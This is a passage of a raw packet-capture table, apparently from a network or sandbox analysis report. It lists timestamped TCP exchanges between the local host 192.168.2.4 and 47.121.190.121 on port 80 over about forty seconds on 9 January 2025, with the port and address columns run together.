              Jan 9, 2025 18:27:53.006006956 CET814978647.121.190.121192.168.2.4
              Jan 9, 2025 18:27:53.118407965 CET4978781192.168.2.447.121.190.121
              Jan 9, 2025 18:27:53.123518944 CET814978747.121.190.121192.168.2.4
              Jan 9, 2025 18:27:53.125982046 CET4978781192.168.2.447.121.190.121
              Jan 9, 2025 18:27:53.126132965 CET4978781192.168.2.447.121.190.121
              Jan 9, 2025 18:27:53.131176949 CET814978747.121.190.121192.168.2.4
              Jan 9, 2025 18:27:54.063759089 CET814978747.121.190.121192.168.2.4
              Jan 9, 2025 18:27:54.063827038 CET814978747.121.190.121192.168.2.4
              Jan 9, 2025 18:27:54.063851118 CET4978781192.168.2.447.121.190.121
              Jan 9, 2025 18:27:54.063913107 CET4978781192.168.2.447.121.190.121
              Jan 9, 2025 18:27:54.063987017 CET4978781192.168.2.447.121.190.121
              Jan 9, 2025 18:27:54.068779945 CET814978747.121.190.121192.168.2.4
              Jan 9, 2025 18:27:54.179538965 CET4978981192.168.2.447.121.190.121
              Jan 9, 2025 18:27:54.184493065 CET814978947.121.190.121192.168.2.4
              Jan 9, 2025 18:27:54.184597969 CET4978981192.168.2.447.121.190.121
              Jan 9, 2025 18:27:54.184781075 CET4978981192.168.2.447.121.190.121
              Jan 9, 2025 18:27:54.189526081 CET814978947.121.190.121192.168.2.4
              Jan 9, 2025 18:27:55.153366089 CET814978947.121.190.121192.168.2.4
              Jan 9, 2025 18:27:55.153510094 CET814978947.121.190.121192.168.2.4
              Jan 9, 2025 18:27:55.153573036 CET4978981192.168.2.447.121.190.121
              Jan 9, 2025 18:27:55.153724909 CET4978981192.168.2.447.121.190.121
              Jan 9, 2025 18:27:55.158451080 CET814978947.121.190.121192.168.2.4
              Jan 9, 2025 18:27:55.273197889 CET4979581192.168.2.447.121.190.121
              Jan 9, 2025 18:27:55.278089046 CET814979547.121.190.121192.168.2.4
              Jan 9, 2025 18:27:55.279827118 CET4979581192.168.2.447.121.190.121
              Jan 9, 2025 18:27:55.279933929 CET4979581192.168.2.447.121.190.121
              Jan 9, 2025 18:27:55.284657001 CET814979547.121.190.121192.168.2.4
              Jan 9, 2025 18:27:56.241408110 CET814979547.121.190.121192.168.2.4
              Jan 9, 2025 18:27:56.241482019 CET814979547.121.190.121192.168.2.4
              Jan 9, 2025 18:27:56.241630077 CET4979581192.168.2.447.121.190.121
              Jan 9, 2025 18:27:56.241725922 CET4979581192.168.2.447.121.190.121
              Jan 9, 2025 18:27:56.246495008 CET814979547.121.190.121192.168.2.4
              Jan 9, 2025 18:27:56.362732887 CET4980181192.168.2.447.121.190.121
              Jan 9, 2025 18:27:56.367830992 CET814980147.121.190.121192.168.2.4
              Jan 9, 2025 18:27:56.368017912 CET4980181192.168.2.447.121.190.121
              Jan 9, 2025 18:27:56.376281977 CET4980181192.168.2.447.121.190.121
              Jan 9, 2025 18:27:56.381125927 CET814980147.121.190.121192.168.2.4
              Jan 9, 2025 18:27:57.316638947 CET814980147.121.190.121192.168.2.4
              Jan 9, 2025 18:27:57.316873074 CET814980147.121.190.121192.168.2.4
              Jan 9, 2025 18:27:57.316931963 CET4980181192.168.2.447.121.190.121
              Jan 9, 2025 18:27:57.316932917 CET4980181192.168.2.447.121.190.121
              Jan 9, 2025 18:27:57.429364920 CET4980181192.168.2.447.121.190.121
              Jan 9, 2025 18:27:57.429512024 CET4980781192.168.2.447.121.190.121
              Jan 9, 2025 18:27:57.434190989 CET814980147.121.190.121192.168.2.4
              Jan 9, 2025 18:27:57.434294939 CET814980747.121.190.121192.168.2.4
              Jan 9, 2025 18:27:57.434357882 CET4980781192.168.2.447.121.190.121
              Jan 9, 2025 18:27:57.434493065 CET4980781192.168.2.447.121.190.121
              Jan 9, 2025 18:27:57.439328909 CET814980747.121.190.121192.168.2.4
              Jan 9, 2025 18:27:58.395900011 CET814980747.121.190.121192.168.2.4
              Jan 9, 2025 18:27:58.396015882 CET4980781192.168.2.447.121.190.121
              Jan 9, 2025 18:27:58.396089077 CET814980747.121.190.121192.168.2.4
              Jan 9, 2025 18:27:58.396147013 CET4980781192.168.2.447.121.190.121
              Jan 9, 2025 18:27:58.508924007 CET4980781192.168.2.447.121.190.121
              Jan 9, 2025 18:27:58.509169102 CET4981881192.168.2.447.121.190.121
              Jan 9, 2025 18:27:58.513773918 CET814980747.121.190.121192.168.2.4
              Jan 9, 2025 18:27:58.513974905 CET814981847.121.190.121192.168.2.4
              Jan 9, 2025 18:27:58.514060974 CET4981881192.168.2.447.121.190.121
              Jan 9, 2025 18:27:58.514369011 CET4981881192.168.2.447.121.190.121
              Jan 9, 2025 18:27:58.519108057 CET814981847.121.190.121192.168.2.4
              Jan 9, 2025 18:27:59.623790979 CET814981847.121.190.121192.168.2.4
              Jan 9, 2025 18:27:59.623871088 CET4981881192.168.2.447.121.190.121
              Jan 9, 2025 18:27:59.624119997 CET814981847.121.190.121192.168.2.4
              Jan 9, 2025 18:27:59.624176025 CET4981881192.168.2.447.121.190.121
              Jan 9, 2025 18:27:59.741699934 CET4981881192.168.2.447.121.190.121
              Jan 9, 2025 18:27:59.742069006 CET4982481192.168.2.447.121.190.121
              Jan 9, 2025 18:27:59.746473074 CET814981847.121.190.121192.168.2.4
              Jan 9, 2025 18:27:59.746903896 CET814982447.121.190.121192.168.2.4
              Jan 9, 2025 18:27:59.747097015 CET4982481192.168.2.447.121.190.121
              Jan 9, 2025 18:27:59.747189999 CET4982481192.168.2.447.121.190.121
              Jan 9, 2025 18:27:59.751946926 CET814982447.121.190.121192.168.2.4
              Jan 9, 2025 18:28:00.692666054 CET814982447.121.190.121192.168.2.4
              Jan 9, 2025 18:28:00.692770004 CET814982447.121.190.121192.168.2.4
              Jan 9, 2025 18:28:00.692847967 CET4982481192.168.2.447.121.190.121
              Jan 9, 2025 18:28:00.692847967 CET4982481192.168.2.447.121.190.121
              Jan 9, 2025 18:28:00.804332018 CET4982481192.168.2.447.121.190.121
              Jan 9, 2025 18:28:00.804646015 CET4983081192.168.2.447.121.190.121
              Jan 9, 2025 18:28:00.809210062 CET814982447.121.190.121192.168.2.4
              Jan 9, 2025 18:28:00.809448957 CET814983047.121.190.121192.168.2.4
              Jan 9, 2025 18:28:00.809509993 CET4983081192.168.2.447.121.190.121
              Jan 9, 2025 18:28:00.809634924 CET4983081192.168.2.447.121.190.121
              Jan 9, 2025 18:28:00.814380884 CET814983047.121.190.121192.168.2.4
              Jan 9, 2025 18:28:01.758723974 CET814983047.121.190.121192.168.2.4
              Jan 9, 2025 18:28:01.758775949 CET4983081192.168.2.447.121.190.121
              Jan 9, 2025 18:28:01.758794069 CET814983047.121.190.121192.168.2.4
              Jan 9, 2025 18:28:01.758853912 CET4983081192.168.2.447.121.190.121
              Jan 9, 2025 18:28:01.758908033 CET4983081192.168.2.447.121.190.121
              Jan 9, 2025 18:28:01.763701916 CET814983047.121.190.121192.168.2.4
              Jan 9, 2025 18:28:01.867228031 CET4983781192.168.2.447.121.190.121
              Jan 9, 2025 18:28:01.874535084 CET814983747.121.190.121192.168.2.4
              Jan 9, 2025 18:28:01.874716997 CET4983781192.168.2.447.121.190.121
              Jan 9, 2025 18:28:01.874717951 CET4983781192.168.2.447.121.190.121
              Jan 9, 2025 18:28:01.879570007 CET814983747.121.190.121192.168.2.4
              Jan 9, 2025 18:28:02.810645103 CET814983747.121.190.121192.168.2.4
              Jan 9, 2025 18:28:02.810664892 CET814983747.121.190.121192.168.2.4
              Jan 9, 2025 18:28:02.810822010 CET4983781192.168.2.447.121.190.121
              Jan 9, 2025 18:28:02.810868979 CET4983781192.168.2.447.121.190.121
              Jan 9, 2025 18:28:02.815737963 CET814983747.121.190.121192.168.2.4
              Jan 9, 2025 18:28:02.929493904 CET4984181192.168.2.447.121.190.121
              Jan 9, 2025 18:28:02.934516907 CET814984147.121.190.121192.168.2.4
              Jan 9, 2025 18:28:02.940042019 CET4984181192.168.2.447.121.190.121
              Jan 9, 2025 18:28:02.943342924 CET4984181192.168.2.447.121.190.121
              Jan 9, 2025 18:28:02.948184967 CET814984147.121.190.121192.168.2.4
              Jan 9, 2025 18:28:03.988145113 CET814984147.121.190.121192.168.2.4
              Jan 9, 2025 18:28:03.988212109 CET4984181192.168.2.447.121.190.121
              Jan 9, 2025 18:28:03.988245964 CET814984147.121.190.121192.168.2.4
              Jan 9, 2025 18:28:03.988312960 CET4984181192.168.2.447.121.190.121
              Jan 9, 2025 18:28:04.040131092 CET4984181192.168.2.447.121.190.121
              Jan 9, 2025 18:28:04.045124054 CET814984147.121.190.121192.168.2.4
              Jan 9, 2025 18:28:04.220056057 CET4984981192.168.2.447.121.190.121
              Jan 9, 2025 18:28:04.224903107 CET814984947.121.190.121192.168.2.4
              Jan 9, 2025 18:28:04.225084066 CET4984981192.168.2.447.121.190.121
              Jan 9, 2025 18:28:04.231498003 CET4984981192.168.2.447.121.190.121
              Jan 9, 2025 18:28:04.236534119 CET814984947.121.190.121192.168.2.4
              Jan 9, 2025 18:28:05.321083069 CET814984947.121.190.121192.168.2.4
              Jan 9, 2025 18:28:05.321263075 CET814984947.121.190.121192.168.2.4
              Jan 9, 2025 18:28:05.321293116 CET4984981192.168.2.447.121.190.121
              Jan 9, 2025 18:28:05.321384907 CET4984981192.168.2.447.121.190.121
              Jan 9, 2025 18:28:05.446887016 CET4984981192.168.2.447.121.190.121
              Jan 9, 2025 18:28:05.447062016 CET4985681192.168.2.447.121.190.121
              Jan 9, 2025 18:28:05.452151060 CET814984947.121.190.121192.168.2.4
              Jan 9, 2025 18:28:05.452193022 CET814985647.121.190.121192.168.2.4
              Jan 9, 2025 18:28:05.452296972 CET4985681192.168.2.447.121.190.121
              Jan 9, 2025 18:28:05.452390909 CET4985681192.168.2.447.121.190.121
              Jan 9, 2025 18:28:05.457370996 CET814985647.121.190.121192.168.2.4
              Jan 9, 2025 18:28:06.413224936 CET814985647.121.190.121192.168.2.4
              Jan 9, 2025 18:28:06.413300037 CET4985681192.168.2.447.121.190.121
              Jan 9, 2025 18:28:06.413391113 CET814985647.121.190.121192.168.2.4
              Jan 9, 2025 18:28:06.413434982 CET4985681192.168.2.447.121.190.121
              Jan 9, 2025 18:28:06.413506985 CET4985681192.168.2.447.121.190.121
              Jan 9, 2025 18:28:06.418344021 CET814985647.121.190.121192.168.2.4
              Jan 9, 2025 18:28:06.523582935 CET4986381192.168.2.447.121.190.121
              Jan 9, 2025 18:28:06.528458118 CET814986347.121.190.121192.168.2.4
              Jan 9, 2025 18:28:06.528549910 CET4986381192.168.2.447.121.190.121
              Jan 9, 2025 18:28:06.528783083 CET4986381192.168.2.447.121.190.121
              Jan 9, 2025 18:28:06.533626080 CET814986347.121.190.121192.168.2.4
              Jan 9, 2025 18:28:07.532258034 CET814986347.121.190.121192.168.2.4
              Jan 9, 2025 18:28:07.532294989 CET814986347.121.190.121192.168.2.4
              Jan 9, 2025 18:28:07.532474041 CET4986381192.168.2.447.121.190.121
              Jan 9, 2025 18:28:07.532474041 CET4986381192.168.2.447.121.190.121
              Jan 9, 2025 18:28:07.537470102 CET814986347.121.190.121192.168.2.4
              Jan 9, 2025 18:28:07.648396969 CET4987381192.168.2.447.121.190.121
              Jan 9, 2025 18:28:07.653300047 CET814987347.121.190.121192.168.2.4
              Jan 9, 2025 18:28:07.653443098 CET4987381192.168.2.447.121.190.121
              Jan 9, 2025 18:28:07.653525114 CET4987381192.168.2.447.121.190.121
              Jan 9, 2025 18:28:07.658346891 CET814987347.121.190.121192.168.2.4
              Jan 9, 2025 18:28:08.601628065 CET814987347.121.190.121192.168.2.4
              Jan 9, 2025 18:28:08.601718903 CET814987347.121.190.121192.168.2.4
              Jan 9, 2025 18:28:08.601794958 CET4987381192.168.2.447.121.190.121
              Jan 9, 2025 18:28:08.601794958 CET4987381192.168.2.447.121.190.121
              Jan 9, 2025 18:28:08.614986897 CET4987381192.168.2.447.121.190.121
              Jan 9, 2025 18:28:08.619782925 CET814987347.121.190.121192.168.2.4
              Jan 9, 2025 18:28:08.731334925 CET4987981192.168.2.447.121.190.121
              Jan 9, 2025 18:28:08.736149073 CET814987947.121.190.121192.168.2.4
              Jan 9, 2025 18:28:08.736232042 CET4987981192.168.2.447.121.190.121
              Jan 9, 2025 18:28:08.745033026 CET4987981192.168.2.447.121.190.121
              Jan 9, 2025 18:28:08.749865055 CET814987947.121.190.121192.168.2.4
              Jan 9, 2025 18:28:09.788600922 CET814987947.121.190.121192.168.2.4
              Jan 9, 2025 18:28:09.788650990 CET4987981192.168.2.447.121.190.121
              Jan 9, 2025 18:28:09.788686991 CET814987947.121.190.121192.168.2.4
              Jan 9, 2025 18:28:09.788808107 CET4987981192.168.2.447.121.190.121
              Jan 9, 2025 18:28:09.788938999 CET4987981192.168.2.447.121.190.121
              Jan 9, 2025 18:28:09.793672085 CET814987947.121.190.121192.168.2.4
              Jan 9, 2025 18:28:09.898292065 CET4988681192.168.2.447.121.190.121
              Jan 9, 2025 18:28:09.903040886 CET814988647.121.190.121192.168.2.4
              Jan 9, 2025 18:28:09.904090881 CET4988681192.168.2.447.121.190.121
              Jan 9, 2025 18:28:09.904177904 CET4988681192.168.2.447.121.190.121
              Jan 9, 2025 18:28:09.908934116 CET814988647.121.190.121192.168.2.4
              Jan 9, 2025 18:28:10.873101950 CET814988647.121.190.121192.168.2.4
              Jan 9, 2025 18:28:10.873172998 CET4988681192.168.2.447.121.190.121
              Jan 9, 2025 18:28:10.873256922 CET814988647.121.190.121192.168.2.4
              Jan 9, 2025 18:28:10.873294115 CET4988681192.168.2.447.121.190.121
              Jan 9, 2025 18:28:10.977735996 CET4988681192.168.2.447.121.190.121
              Jan 9, 2025 18:28:10.978034019 CET4989381192.168.2.447.121.190.121
              Jan 9, 2025 18:28:10.982491970 CET814988647.121.190.121192.168.2.4
              Jan 9, 2025 18:28:10.982758999 CET814989347.121.190.121192.168.2.4
              Jan 9, 2025 18:28:10.986517906 CET4989381192.168.2.447.121.190.121
              Jan 9, 2025 18:28:10.986663103 CET4989381192.168.2.447.121.190.121
              Jan 9, 2025 18:28:10.991426945 CET814989347.121.190.121192.168.2.4
              Jan 9, 2025 18:28:11.954770088 CET814989347.121.190.121192.168.2.4
              Jan 9, 2025 18:28:11.954818964 CET4989381192.168.2.447.121.190.121
              Jan 9, 2025 18:28:11.954906940 CET814989347.121.190.121192.168.2.4
              Jan 9, 2025 18:28:11.954950094 CET4989381192.168.2.447.121.190.121
              Jan 9, 2025 18:28:12.070199013 CET4989381192.168.2.447.121.190.121
              Jan 9, 2025 18:28:12.070525885 CET4990281192.168.2.447.121.190.121
              Jan 9, 2025 18:28:12.074996948 CET814989347.121.190.121192.168.2.4
              Jan 9, 2025 18:28:12.075423956 CET814990247.121.190.121192.168.2.4
              Jan 9, 2025 18:28:12.075489998 CET4990281192.168.2.447.121.190.121
              Jan 9, 2025 18:28:12.075596094 CET4990281192.168.2.447.121.190.121
              Jan 9, 2025 18:28:12.080399990 CET814990247.121.190.121192.168.2.4
              Jan 9, 2025 18:28:13.119453907 CET814990247.121.190.121192.168.2.4
              Jan 9, 2025 18:28:13.119519949 CET814990247.121.190.121192.168.2.4
              Jan 9, 2025 18:28:13.119522095 CET4990281192.168.2.447.121.190.121
              Jan 9, 2025 18:28:13.119569063 CET4990281192.168.2.447.121.190.121
              Jan 9, 2025 18:28:13.119654894 CET4990281192.168.2.447.121.190.121
              Jan 9, 2025 18:28:13.124433041 CET814990247.121.190.121192.168.2.4
              Jan 9, 2025 18:28:13.227248907 CET4990981192.168.2.447.121.190.121
              Jan 9, 2025 18:28:13.232193947 CET814990947.121.190.121192.168.2.4
              Jan 9, 2025 18:28:13.236090899 CET4990981192.168.2.447.121.190.121
              Jan 9, 2025 18:28:13.236175060 CET4990981192.168.2.447.121.190.121
              Jan 9, 2025 18:28:13.240992069 CET814990947.121.190.121192.168.2.4
              Jan 9, 2025 18:28:14.194960117 CET814990947.121.190.121192.168.2.4
              Jan 9, 2025 18:28:14.194969893 CET814990947.121.190.121192.168.2.4
              Jan 9, 2025 18:28:14.195019960 CET4990981192.168.2.447.121.190.121
              Jan 9, 2025 18:28:14.195177078 CET4990981192.168.2.447.121.190.121
              Jan 9, 2025 18:28:14.199929953 CET814990947.121.190.121192.168.2.4
              Jan 9, 2025 18:28:14.304658890 CET4991681192.168.2.447.121.190.121
              Jan 9, 2025 18:28:14.309825897 CET814991647.121.190.121192.168.2.4
              Jan 9, 2025 18:28:14.309914112 CET4991681192.168.2.447.121.190.121
              Jan 9, 2025 18:28:14.310036898 CET4991681192.168.2.447.121.190.121
              Jan 9, 2025 18:28:14.314990997 CET814991647.121.190.121192.168.2.4
              Jan 9, 2025 18:28:15.252454042 CET814991647.121.190.121192.168.2.4
              Jan 9, 2025 18:28:15.252536058 CET4991681192.168.2.447.121.190.121
              Jan 9, 2025 18:28:15.252568960 CET814991647.121.190.121192.168.2.4
              Jan 9, 2025 18:28:15.252614021 CET4991681192.168.2.447.121.190.121
              Jan 9, 2025 18:28:15.252773046 CET4991681192.168.2.447.121.190.121
              Jan 9, 2025 18:28:15.257533073 CET814991647.121.190.121192.168.2.4
              Jan 9, 2025 18:28:15.366990089 CET4992681192.168.2.447.121.190.121
              Jan 9, 2025 18:28:15.371788979 CET814992647.121.190.121192.168.2.4
              Jan 9, 2025 18:28:15.371854067 CET4992681192.168.2.447.121.190.121
              Jan 9, 2025 18:28:15.371932983 CET4992681192.168.2.447.121.190.121
              Jan 9, 2025 18:28:15.376712084 CET814992647.121.190.121192.168.2.4
              Jan 9, 2025 18:28:16.440069914 CET814992647.121.190.121192.168.2.4
              Jan 9, 2025 18:28:16.440191031 CET4992681192.168.2.447.121.190.121
              Jan 9, 2025 18:28:16.440290928 CET814992647.121.190.121192.168.2.4
              Jan 9, 2025 18:28:16.440356016 CET4992681192.168.2.447.121.190.121
              Jan 9, 2025 18:28:16.556915045 CET4992681192.168.2.447.121.190.121
              Jan 9, 2025 18:28:16.557482958 CET4993281192.168.2.447.121.190.121
              Jan 9, 2025 18:28:16.667993069 CET814992647.121.190.121192.168.2.4
              Jan 9, 2025 18:28:16.668009043 CET814993247.121.190.121192.168.2.4
              Jan 9, 2025 18:28:16.668087006 CET4993281192.168.2.447.121.190.121
              Jan 9, 2025 18:28:16.668273926 CET4993281192.168.2.447.121.190.121
              Jan 9, 2025 18:28:16.673011065 CET814993247.121.190.121192.168.2.4
              Jan 9, 2025 18:28:17.614890099 CET814993247.121.190.121192.168.2.4
              Jan 9, 2025 18:28:17.615015984 CET814993247.121.190.121192.168.2.4
              Jan 9, 2025 18:28:17.615108967 CET4993281192.168.2.447.121.190.121
              Jan 9, 2025 18:28:17.615206957 CET4993281192.168.2.447.121.190.121
              Jan 9, 2025 18:28:17.619927883 CET814993247.121.190.121192.168.2.4
              Jan 9, 2025 18:28:17.747972965 CET4993981192.168.2.447.121.190.121
              Jan 9, 2025 18:28:17.752810955 CET814993947.121.190.121192.168.2.4
              Jan 9, 2025 18:28:17.754677057 CET4993981192.168.2.447.121.190.121
              Jan 9, 2025 18:28:17.754844904 CET4993981192.168.2.447.121.190.121
              Jan 9, 2025 18:28:17.759588957 CET814993947.121.190.121192.168.2.4
              Jan 9, 2025 18:28:18.708796978 CET814993947.121.190.121192.168.2.4
              Jan 9, 2025 18:28:18.708945990 CET814993947.121.190.121192.168.2.4
              Jan 9, 2025 18:28:18.709014893 CET4993981192.168.2.447.121.190.121
              Jan 9, 2025 18:28:18.709105968 CET4993981192.168.2.447.121.190.121
              Jan 9, 2025 18:28:18.713839054 CET814993947.121.190.121192.168.2.4
              Jan 9, 2025 18:28:18.855397940 CET4994881192.168.2.447.121.190.121
              Jan 9, 2025 18:28:18.860266924 CET814994847.121.190.121192.168.2.4
              Jan 9, 2025 18:28:18.860347033 CET4994881192.168.2.447.121.190.121
              Jan 9, 2025 18:28:18.860543013 CET4994881192.168.2.447.121.190.121
              Jan 9, 2025 18:28:18.865283966 CET814994847.121.190.121192.168.2.4
              Jan 9, 2025 18:28:19.801464081 CET814994847.121.190.121192.168.2.4
              Jan 9, 2025 18:28:19.801526070 CET4994881192.168.2.447.121.190.121
              Jan 9, 2025 18:28:19.801568985 CET814994847.121.190.121192.168.2.4
              Jan 9, 2025 18:28:19.801614046 CET4994881192.168.2.447.121.190.121
              Jan 9, 2025 18:28:19.801747084 CET4994881192.168.2.447.121.190.121
              Jan 9, 2025 18:28:19.806539059 CET814994847.121.190.121192.168.2.4
              Jan 9, 2025 18:28:19.931781054 CET4995581192.168.2.447.121.190.121
              Jan 9, 2025 18:28:19.936690092 CET814995547.121.190.121192.168.2.4
              Jan 9, 2025 18:28:19.936780930 CET4995581192.168.2.447.121.190.121
              Jan 9, 2025 18:28:19.936959028 CET4995581192.168.2.447.121.190.121
              Jan 9, 2025 18:28:19.941719055 CET814995547.121.190.121192.168.2.4
              Jan 9, 2025 18:28:20.911350012 CET814995547.121.190.121192.168.2.4
              Jan 9, 2025 18:28:20.911425114 CET814995547.121.190.121192.168.2.4
              Jan 9, 2025 18:28:20.911426067 CET4995581192.168.2.447.121.190.121
              Jan 9, 2025 18:28:20.911514997 CET4995581192.168.2.447.121.190.121
              Jan 9, 2025 18:28:20.911596060 CET4995581192.168.2.447.121.190.121
              Jan 9, 2025 18:28:20.916368961 CET814995547.121.190.121192.168.2.4
              Jan 9, 2025 18:28:21.041168928 CET4996381192.168.2.447.121.190.121
              Jan 9, 2025 18:28:21.045978069 CET814996347.121.190.121192.168.2.4
              Jan 9, 2025 18:28:21.046067953 CET4996381192.168.2.447.121.190.121
              Jan 9, 2025 18:28:21.046225071 CET4996381192.168.2.447.121.190.121
              Jan 9, 2025 18:28:21.050968885 CET814996347.121.190.121192.168.2.4
              Jan 9, 2025 18:28:22.022670984 CET814996347.121.190.121192.168.2.4
              Jan 9, 2025 18:28:22.022759914 CET4996381192.168.2.447.121.190.121
              Jan 9, 2025 18:28:22.022825003 CET814996347.121.190.121192.168.2.4
              Jan 9, 2025 18:28:22.023128986 CET4996381192.168.2.447.121.190.121
              Jan 9, 2025 18:28:22.212610006 CET4997181192.168.2.447.121.190.121
              Jan 9, 2025 18:28:22.212622881 CET4996381192.168.2.447.121.190.121
              Jan 9, 2025 18:28:22.217705011 CET814997147.121.190.121192.168.2.4
              Jan 9, 2025 18:28:22.217714071 CET814996347.121.190.121192.168.2.4
              Jan 9, 2025 18:28:22.217794895 CET4997181192.168.2.447.121.190.121
              Jan 9, 2025 18:28:22.217961073 CET4997181192.168.2.447.121.190.121
              Jan 9, 2025 18:28:22.222707033 CET814997147.121.190.121192.168.2.4
              Jan 9, 2025 18:28:23.167850018 CET814997147.121.190.121192.168.2.4
              Jan 9, 2025 18:28:23.167905092 CET4997181192.168.2.447.121.190.121
              Jan 9, 2025 18:28:23.167959929 CET814997147.121.190.121192.168.2.4
              Jan 9, 2025 18:28:23.168003082 CET4997181192.168.2.447.121.190.121
              Jan 9, 2025 18:28:23.168077946 CET4997181192.168.2.447.121.190.121
              Jan 9, 2025 18:28:23.173372030 CET814997147.121.190.121192.168.2.4
              Jan 9, 2025 18:28:23.292521954 CET4997881192.168.2.447.121.190.121
              Jan 9, 2025 18:28:23.297362089 CET814997847.121.190.121192.168.2.4
              Jan 9, 2025 18:28:23.297422886 CET4997881192.168.2.447.121.190.121
              Jan 9, 2025 18:28:23.297537088 CET4997881192.168.2.447.121.190.121
              Jan 9, 2025 18:28:23.302361965 CET814997847.121.190.121192.168.2.4
              Jan 9, 2025 18:28:24.294481039 CET814997847.121.190.121192.168.2.4
              Jan 9, 2025 18:28:24.294610977 CET814997847.121.190.121192.168.2.4
              Jan 9, 2025 18:28:24.294644117 CET4997881192.168.2.447.121.190.121
              Jan 9, 2025 18:28:24.295052052 CET4997881192.168.2.447.121.190.121
              Jan 9, 2025 18:28:24.665745974 CET4997881192.168.2.447.121.190.121
              Jan 9, 2025 18:28:24.666002035 CET4998881192.168.2.447.121.190.121
              Jan 9, 2025 18:28:24.670615911 CET814997847.121.190.121192.168.2.4
              Jan 9, 2025 18:28:24.670829058 CET814998847.121.190.121192.168.2.4
              Jan 9, 2025 18:28:24.670903921 CET4998881192.168.2.447.121.190.121
              Jan 9, 2025 18:28:24.671117067 CET4998881192.168.2.447.121.190.121
              Jan 9, 2025 18:28:24.675904989 CET814998847.121.190.121192.168.2.4
              Jan 9, 2025 18:28:25.657701969 CET814998847.121.190.121192.168.2.4
              Jan 9, 2025 18:28:25.658521891 CET4998881192.168.2.447.121.190.121
              Jan 9, 2025 18:28:25.658561945 CET814998847.121.190.121192.168.2.4
              Jan 9, 2025 18:28:25.659287930 CET4998881192.168.2.447.121.190.121
              Jan 9, 2025 18:28:25.946768999 CET4998881192.168.2.447.121.190.121
              Jan 9, 2025 18:28:25.946784973 CET4999681192.168.2.447.121.190.121
              Jan 9, 2025 18:28:25.953376055 CET814998847.121.190.121192.168.2.4
              Jan 9, 2025 18:28:25.953413010 CET814999647.121.190.121192.168.2.4
              Jan 9, 2025 18:28:25.953644037 CET4999681192.168.2.447.121.190.121
              Jan 9, 2025 18:28:25.953855038 CET4999681192.168.2.447.121.190.121
              Jan 9, 2025 18:28:25.959433079 CET814999647.121.190.121192.168.2.4
              Jan 9, 2025 18:28:27.021359921 CET814999647.121.190.121192.168.2.4
              Jan 9, 2025 18:28:27.021502972 CET4999681192.168.2.447.121.190.121
              Jan 9, 2025 18:28:27.021545887 CET814999647.121.190.121192.168.2.4
              Jan 9, 2025 18:28:27.021593094 CET4999681192.168.2.447.121.190.121
              Jan 9, 2025 18:28:27.274125099 CET4999681192.168.2.447.121.190.121
              Jan 9, 2025 18:28:27.278934002 CET814999647.121.190.121192.168.2.4
              Jan 9, 2025 18:28:27.280602932 CET5000581192.168.2.447.121.190.121
              Jan 9, 2025 18:28:27.285413027 CET815000547.121.190.121192.168.2.4
              Jan 9, 2025 18:28:27.285487890 CET5000581192.168.2.447.121.190.121
              Jan 9, 2025 18:28:27.302829027 CET5000581192.168.2.447.121.190.121
              Jan 9, 2025 18:28:27.307709932 CET815000547.121.190.121192.168.2.4
              Jan 9, 2025 18:28:28.241074085 CET815000547.121.190.121192.168.2.4
              Jan 9, 2025 18:28:28.241166115 CET5000581192.168.2.447.121.190.121
              Jan 9, 2025 18:28:28.241662025 CET815000547.121.190.121192.168.2.4
              Jan 9, 2025 18:28:28.242558002 CET5000581192.168.2.447.121.190.121
              Jan 9, 2025 18:28:28.353152990 CET5000581192.168.2.447.121.190.121
              Jan 9, 2025 18:28:28.353159904 CET5001281192.168.2.447.121.190.121
              Jan 9, 2025 18:28:28.358011007 CET815000547.121.190.121192.168.2.4
              Jan 9, 2025 18:28:28.358062029 CET815001247.121.190.121192.168.2.4
              Jan 9, 2025 18:28:28.358198881 CET5001281192.168.2.447.121.190.121
              Jan 9, 2025 18:28:28.358308077 CET5001281192.168.2.447.121.190.121
              Jan 9, 2025 18:28:28.363138914 CET815001247.121.190.121192.168.2.4
              Jan 9, 2025 18:28:29.362265110 CET815001247.121.190.121192.168.2.4
              Jan 9, 2025 18:28:29.362325907 CET5001281192.168.2.447.121.190.121
              Jan 9, 2025 18:28:29.362642050 CET815001247.121.190.121192.168.2.4
              Jan 9, 2025 18:28:29.362724066 CET5001281192.168.2.447.121.190.121
              Jan 9, 2025 18:28:29.477737904 CET5001281192.168.2.447.121.190.121
              Jan 9, 2025 18:28:29.477957010 CET5002081192.168.2.447.121.190.121
              Jan 9, 2025 18:28:29.482542992 CET815001247.121.190.121192.168.2.4
              Jan 9, 2025 18:28:29.482789040 CET815002047.121.190.121192.168.2.4
              Jan 9, 2025 18:28:29.482844114 CET5002081192.168.2.447.121.190.121
              Jan 9, 2025 18:28:29.482963085 CET5002081192.168.2.447.121.190.121
              Jan 9, 2025 18:28:29.487798929 CET815002047.121.190.121192.168.2.4
              Jan 9, 2025 18:28:30.463933945 CET815002047.121.190.121192.168.2.4
              Jan 9, 2025 18:28:30.463973045 CET815002047.121.190.121192.168.2.4
              Jan 9, 2025 18:28:30.463975906 CET5002081192.168.2.447.121.190.121
              Jan 9, 2025 18:28:30.464000940 CET5002081192.168.2.447.121.190.121
              Jan 9, 2025 18:28:30.464118958 CET5002081192.168.2.447.121.190.121
              Jan 9, 2025 18:28:30.468911886 CET815002047.121.190.121192.168.2.4
              Jan 9, 2025 18:28:30.577907085 CET5002881192.168.2.447.121.190.121
              Jan 9, 2025 18:28:30.582736969 CET815002847.121.190.121192.168.2.4
              Jan 9, 2025 18:28:30.582844019 CET5002881192.168.2.447.121.190.121
              Jan 9, 2025 18:28:30.582952023 CET5002881192.168.2.447.121.190.121
              Jan 9, 2025 18:28:30.587744951 CET815002847.121.190.121192.168.2.4
              Jan 9, 2025 18:28:31.677527905 CET815002847.121.190.121192.168.2.4
              Jan 9, 2025 18:28:31.677591085 CET5002881192.168.2.447.121.190.121
              Jan 9, 2025 18:28:31.677757978 CET815002847.121.190.121192.168.2.4
              Jan 9, 2025 18:28:31.677803040 CET5002881192.168.2.447.121.190.121
              Jan 9, 2025 18:28:31.678049088 CET5002881192.168.2.447.121.190.121
              Jan 9, 2025 18:28:31.683156013 CET815002847.121.190.121192.168.2.4
              Jan 9, 2025 18:28:31.806202888 CET5003581192.168.2.447.121.190.121
              Jan 9, 2025 18:28:31.811014891 CET815003547.121.190.121192.168.2.4
              Jan 9, 2025 18:28:31.811069965 CET5003581192.168.2.447.121.190.121
              Jan 9, 2025 18:28:31.811155081 CET5003581192.168.2.447.121.190.121
              Jan 9, 2025 18:28:31.815922976 CET815003547.121.190.121192.168.2.4
              Jan 9, 2025 18:28:32.800879002 CET815003547.121.190.121192.168.2.4
              Jan 9, 2025 18:28:32.800889969 CET815003547.121.190.121192.168.2.4
